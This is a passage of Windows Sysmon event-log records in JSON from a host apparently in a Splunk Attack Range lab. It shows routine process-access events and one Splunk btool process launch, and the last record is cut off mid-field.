{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1759,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.599\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.599","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1760,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.599\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-0010F6830300}\r\nTargetProcessId: 4044\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.599","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010F6830300}","TargetProcessId":"4044","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1761,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.617\r\nProcessGuid: {E2A3D6B1-106C-5F25-0000-0010B3840300}\r\nProcessId: 4056\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {E2A3D6B1-106C-5F25-0000-0010F6830300}\r\nParentProcessId: 4044\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.617","ProcessGuid":"{E2A3D6B1-106C-5F25-0000-0010B3840300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{E2A3D6B1-106C-5F25-0000-0010F6830300}","ParentProcessId":"4044","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1762,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.615\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010F6830300}\r\nSourceProcessId: 4044\r\nSourceThreadId: 4048\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-0010B3840300}\r\nTargetProcessId: 4056\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.615","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010F6830300}","SourceProcessId":"4044","SourceThreadId":"4048","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010B3840300}","TargetProcessId":"4056","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1763,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.615\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-0010B3840300}\r\nTargetProcessId: 4056\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.615","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010B3840300}","TargetProcessId":"4056","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1764,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.615\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.615","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1765,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.615\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.615","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1766,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.615\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.615","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1767,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.615\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.615","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1768,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.615\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: 